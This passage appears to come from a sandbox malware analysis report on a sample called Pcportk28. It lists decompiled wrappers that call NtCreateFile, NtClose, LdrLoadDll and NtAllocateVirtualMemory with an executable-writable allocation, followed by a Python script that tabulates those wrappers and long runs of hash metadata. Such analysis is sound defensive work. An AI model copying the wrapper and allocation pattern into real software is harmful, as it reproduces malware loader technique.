                                                 Instruction addresses: 0x004185ef to 0x00418631

                                                APIs
                                                • NtCreateFile.NTDLL(00000060,00408B13,?,00413BB7,00408B13,FFFFFFFF,?,?,FFFFFFFF,00408B13,00413BB7,?,00408B13,00000060,00000000,00000000), ref: 0041862D
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519475611.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_Pcportk28.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID:
                                                • API String ID: 823142352-0
                                                • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                • Instruction ID: 36c6eae92b8005ba539885d914b12f5379157c135ee825ad128bd076db7cd32f
                                                • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                • Instruction Fuzzy Hash: 24F0B2B2204208ABCB08CF89DC95EEB77ADAF8C754F158248FA0D97241C630E851CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                control_flow_graph 349 4187c0-4187fd call 4191e0 NtAllocateVirtualMemory
                                                C-Code - Quality: 100%
                                                 			E004187C0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {   // NtAllocateVirtualMemory wrapper: six arguments as in the documented prototype (ProcessHandle, BaseAddress, ZeroBits, RegionSize, AllocationType, Protect)
                                                 				long _t14;
                                                 				void* _t21;
                                                 
                                                 				_t3 = _a4 + 0xc60; // 0xca0
                                                 				E004191E0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);   // shared pre-call helper with the NtAllocateVirtualMemory constant 0x30
                                                 				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed  (the APIs line below records 00003000 and 00000040 on the stack at this call, numerically MEM_COMMIT|MEM_RESERVE and PAGE_EXECUTE_READWRITE)
                                                 				return _t14;
                                                 			}





                                                 Instruction addresses: 0x004187cf to 0x004187fd

                                                APIs
                                                • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193B4,?,00000000,?,00003000,00000040,00000000,00000000,00408B13), ref: 004187F9
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519475611.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_Pcportk28.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateMemoryVirtual
                                                • String ID:
                                                • API String ID: 2167126740-0
                                                • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                • Instruction ID: 15e9253bdc6667238a85ff9da65bd6f3d3aad2e55959b4b07e7d113ae3ba9bea
                                                • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                • Instruction Fuzzy Hash: 6CF015B2200209ABDB14DF89CC81EEB77ADAF88754F118149FE0897241C630F910CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                 			E00418710(intOrPtr _a4, void* _a8) {   // NtClose wrapper: _a8 is the handle being closed
                                                 				long _t8;
                                                 				void* _t11;
                                                 
                                                 				_t5 = _a4;
                                                 				_t2 = _t5 + 0x10; // 0x300
                                                 				_t3 = _t5 + 0xc50; // 0x409763
                                                 				E004191E0(_t11, _a4, _t3,  *_t2, 0, 0x2c);   // shared pre-call helper with the NtClose constant 0x2c
                                                 				_t8 = NtClose(_a8); // executed
                                                 				return _t8;
                                                 			}





                                                 Instruction addresses: 0x00418713 to 0x00418739

                                                APIs
                                                • NtClose.NTDLL(00413D50,?,?,00413D50,00408B13,FFFFFFFF), ref: 00418735
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519475611.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_Pcportk28.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Close
                                                • String ID:
                                                • API String ID: 3535843008-0
                                                • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                • Instruction ID: bce2094732f0dc6043ed148681cd5d29f2b757d64a263796670ac5fc8daf7d12
                                                • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                • Instruction Fuzzy Hash: 27D01776200214BBE710EB99CC89EE77BACEF48760F154499FA189B242C930FA40C6E0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 82%
                                                 			E0041870B(void* __eax, void* __edx, void* __esi, intOrPtr _a4, void* _a8) {   // same wrapper as E00418710 above, decoded from an entry point five bytes too early; from 0x00418713 on both listings are identical and end in the same NtClose call site 00418735
                                                 				void* _v1947432107;   // bogus local produced by the misaligned decoding, not a real stack slot
                                                 				long _t14;
                                                 				void* _t19;
                                                 
                                                 				asm("salc");   // decoding artifact: a one-byte instruction decoded from bytes that precede the real prologue
                                                 				_t11 = _a4;
                                                 				_t6 = _t11 + 0x10; // 0x300
                                                 				_t7 = _t11 + 0xc50; // 0x409763
                                                 				E004191E0(_t19, _a4, _t7,  *_t6, 0, 0x2c);   // shared pre-call helper with the NtClose constant 0x2c
                                                 				_t14 = NtClose(_a8); // executed
                                                 				return _t14;
                                                 			}






                                                 Instruction addresses: 0x0041870c to 0x00418739

                                                APIs
                                                • NtClose.NTDLL(00413D50,?,?,00413D50,00408B13,FFFFFFFF), ref: 00418735
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519475611.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_Pcportk28.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Close
                                                • String ID:
                                                • API String ID: 3535843008-0
                                                • Opcode ID: e5723cbc30639a60c29b0e4d2bdf3396e620d91b9ef30188d952d97442a17d48
                                                • Instruction ID: d2e932f7c5f20ef975760f6ef5b964e6c25fa2671074bb2052d699baf9ba6776
                                                • Opcode Fuzzy Hash: e5723cbc30639a60c29b0e4d2bdf3396e620d91b9ef30188d952d97442a17d48
                                                • Instruction Fuzzy Hash: 26D0C27950D2814BD715FA74A8D108BBB40DE825287145A8EE4A407143C2649215D791
                                                Uniqueness

                                                Uniqueness Score: -1.00%
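The wrappers above share one shape: a call to E004191E0 with a small per-API constant, then the native call. The script below is an added triage helper, not Joe Sandbox code and not code from the analysed sample. It parses decompiled-function excerpts in the layout used on this page (function header, the E004191E0 call, the `// executed` native call and the `APIs` bullet with its `ref:` address) and tabulates which native API each wrapper reaches, which wrappers are one piece of code decoded from two entry points (E004185DA/E004185E0 and E0041870B/E00418710 end in the same call site), and which constant the helper receives for each API. The embedded sample is a constructed, shortened copy of the excerpts on this page; the name E00409B5C for the LdrLoadDll wrapper is an assumption, since its header is cut off above.

```python
"""Tabulate the Nt*/Ldr* wrappers in a Joe Sandbox decompilation dump: which
native API each reaches, which are one piece of code decoded from two entry
points, and which constant the shared pre-call helper receives for each."""
import re
from collections import defaultdict

HELPER = "E004191E0"   # helper every Nt* wrapper on the page calls first

# Constructed sample copied from the report section above (argument lists
# shortened, closing braces and "APIs" headers dropped). The first function's
# header is cut off on the page; E00409B5C is assumed from its first address.
REPORT_EXCERPT = """\
E00409B5C(void* __eflags, intOrPtr _a4, intOrPtr _a8) {
    LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
• LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BB2
E004185DA(void* __ecx, void* __edx, intOrPtr _a4, HANDLE* _a8) {
    asm("arpl [0xec8b55ad], ax");
    E004191E0(_t35, _a4, _t4,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
    _t22 = NtCreateFile(_a8, _a12, _a16, _a20); // executed
• NtCreateFile.NTDLL(00000060,00408B13,?,00413BB7), ref: 0041862D
E004185E0(intOrPtr _a4, HANDLE* _a8, long _a12) {
    E004191E0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
    _t21 = NtCreateFile(_a8, _a12, _a16, _a20); // executed
• NtCreateFile.NTDLL(00000060,00408B13,?,00413BB7), ref: 0041862D
E004187C0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16) {
    E004191E0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
    _t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20); // executed
• NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193B4), ref: 004187F9
E00418710(intOrPtr _a4, void* _a8) {
    E004191E0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
    _t8 = NtClose(_a8); // executed
• NtClose.NTDLL(00413D50,?,?,00413D50,00408B13), ref: 00418735
E0041870B(void* __eax, void* __edx, void* __esi, intOrPtr _a4, void* _a8) {
    asm("salc");
    E004191E0(_t19, _a4, _t7,  *_t6, 0, 0x2c);
    _t14 = NtClose(_a8); // executed
• NtClose.NTDLL(00413D50,?,?,00413D50,00408B13), ref: 00418735
"""

FUNC_RE = re.compile(r"^(E[0-9A-F]{8})\(.*\)\s*\{$")         # decompiled header
HELPER_RE = re.compile(r"^" + HELPER + r"\(.*,\s*(0x[0-9a-fA-F]+)\);")
EXEC_RE = re.compile(r"^(?:\w+\s*=\s*)?(\w+)\(.*\);\s*//\s*executed")
API_RE = re.compile(r"^•\s*(\w+)\.(\w+)\((.*)\),\s*ref:\s*([0-9A-Fa-f]{8})")
JUNK_RE = re.compile(r'^asm\("')


def parse_wrappers(text):
    """One record per decompiled function, in page order."""
    records, cur = [], {}          # cur starts as a throwaway dict until the first header
    for raw in text.splitlines():
        line = raw.strip()
        if (m := FUNC_RE.match(line)):
            cur = {"func": m.group(1), "executed": None, "api": None,
                   "ref": None, "selector": None, "junk_prefix": False}
            records.append(cur)
        elif JUNK_RE.match(line):
            cur["junk_prefix"] = True           # decoding began before the real entry
        elif (m := HELPER_RE.match(line)):
            cur["selector"] = int(m.group(1), 16)   # last argument to the helper
        elif (m := EXEC_RE.match(line)):
            cur["executed"] = m.group(1)        # the call Joe Sandbox saw run
        elif (m := API_RE.match(line)):
            cur["api"], cur["ref"] = m.group(1), int(m.group(4), 16)
    return records


def collapse_entry_points(records):
    """Group wrappers by the address of the native call they end in; functions
    sharing that address are the same code seen from different entry points."""
    by_ref = defaultdict(list)
    for r in records:
        by_ref[r["ref"]].append(r)
    return dict(by_ref)


def canonical_wrappers(records):
    """One wrapper name per call site, preferring the cleanly decoded entry."""
    return {ref: sorted(group, key=lambda r: r["junk_prefix"])[0]["func"]
            for ref, group in collapse_entry_points(records).items()}


def selector_table(records):
    """Map the constant handed to the helper to the native API behind it."""
    table = {}
    for r in records:
        if r["selector"] is not None and table.setdefault(r["selector"], r["api"]) != r["api"]:
            raise ValueError(f"selector {r['selector']:#x} is ambiguous")
    return table


def mismatches(records):
    """Wrappers whose '// executed' call disagrees with the 'APIs' bullet."""
    return [r["func"] for r in records if r["executed"] != r["api"]]


if __name__ == "__main__":
    recs = parse_wrappers(REPORT_EXCERPT)
    print("mismatches:", mismatches(recs))
    for ref, func in sorted(canonical_wrappers(recs).items()):
        print(f"{ref:#010x} {func}")
    for sel, api in sorted(selector_table(recs).items()):
        print(f"helper selector {sel:#04x} -> {api}")
```

On this page's excerpts the script collapses the six decompiled functions to four call sites and reports the helper constants 0x28, 0x2c and 0x30 for NtCreateFile, NtClose and NtAllocateVirtualMemory respectively; whether E004191E0 uses them as table indices is not established by the excerpt and the script does not claim it.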

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                 • Associated: 00000005.00000002.519635866.0000000000830000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520478568.0000000000920000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520485937.0000000000930000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520500667.0000000000934000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520512267.0000000000937000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520521318.0000000000940000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520592219.00000000009A0000.00000040.00000001.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_830000_Pcportk28.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                 • Associated: 00000005.00000002.519635866.0000000000830000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520478568.0000000000920000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520485937.0000000000930000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520500667.0000000000934000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520512267.0000000000937000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520521318.0000000000940000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520592219.00000000009A0000.00000040.00000001.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_830000_Pcportk28.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                • Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
                                                • Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                • Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                 • Associated: 00000005.00000002.519635866.0000000000830000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520478568.0000000000920000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520485937.0000000000930000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520500667.0000000000934000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520512267.0000000000937000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520521318.0000000000940000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520592219.00000000009A0000.00000040.00000001.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_830000_Pcportk28.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                • Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
                                                • Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                • Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                 • Associated: 00000005.00000002.519635866.0000000000830000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520478568.0000000000920000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520485937.0000000000930000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520500667.0000000000934000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520512267.0000000000937000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520521318.0000000000940000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520592219.00000000009A0000.00000040.00000001.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_830000_Pcportk28.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                                • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                 • Associated: 00000005.00000002.519635866.0000000000830000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520478568.0000000000920000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520485937.0000000000930000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520500667.0000000000934000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520512267.0000000000937000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520521318.0000000000940000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520592219.00000000009A0000.00000040.00000001.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_830000_Pcportk28.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                 • Associated: 00000005.00000002.519635866.0000000000830000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520478568.0000000000920000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520485937.0000000000930000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520500667.0000000000934000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520512267.0000000000937000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520521318.0000000000940000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520592219.00000000009A0000.00000040.00000001.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_830000_Pcportk28.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                 • Associated: 00000005.00000002.519635866.0000000000830000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520478568.0000000000920000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520485937.0000000000930000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520500667.0000000000934000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520512267.0000000000937000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520521318.0000000000940000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520592219.00000000009A0000.00000040.00000001.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_830000_Pcportk28.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                                • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                 • Associated: 00000005.00000002.519635866.0000000000830000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520478568.0000000000920000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520485937.0000000000930000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520500667.0000000000934000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520512267.0000000000937000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520521318.0000000000940000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520592219.00000000009A0000.00000040.00000001.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_830000_Pcportk28.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                 • Associated: 00000005.00000002.519635866.0000000000830000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520478568.0000000000920000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520485937.0000000000930000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520500667.0000000000934000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520512267.0000000000937000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520521318.0000000000940000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520592219.00000000009A0000.00000040.00000001.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_830000_Pcportk28.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                                • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                 • Associated: 00000005.00000002.519635866.0000000000830000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520478568.0000000000920000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520485937.0000000000930000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520500667.0000000000934000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520512267.0000000000937000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520521318.0000000000940000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520592219.00000000009A0000.00000040.00000001.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_830000_Pcportk28.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                 • Associated: 00000005.00000002.519635866.0000000000830000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520478568.0000000000920000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520485937.0000000000930000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520500667.0000000000934000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520512267.0000000000937000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520521318.0000000000940000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520592219.00000000009A0000.00000040.00000001.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_830000_Pcportk28.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                • Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
                                                • Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                • Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                 • Associated: 00000005.00000002.519635866.0000000000830000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520478568.0000000000920000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520485937.0000000000930000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520500667.0000000000934000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520512267.0000000000937000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520521318.0000000000940000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520592219.00000000009A0000.00000040.00000001.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_830000_Pcportk28.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                 • Associated: 00000005.00000002.519635866.0000000000830000.00000040.00000001.sdmp
                                                 • Associated: 00000005.00000002.520478568.0000000000920000.00000040.00000001.sdmp
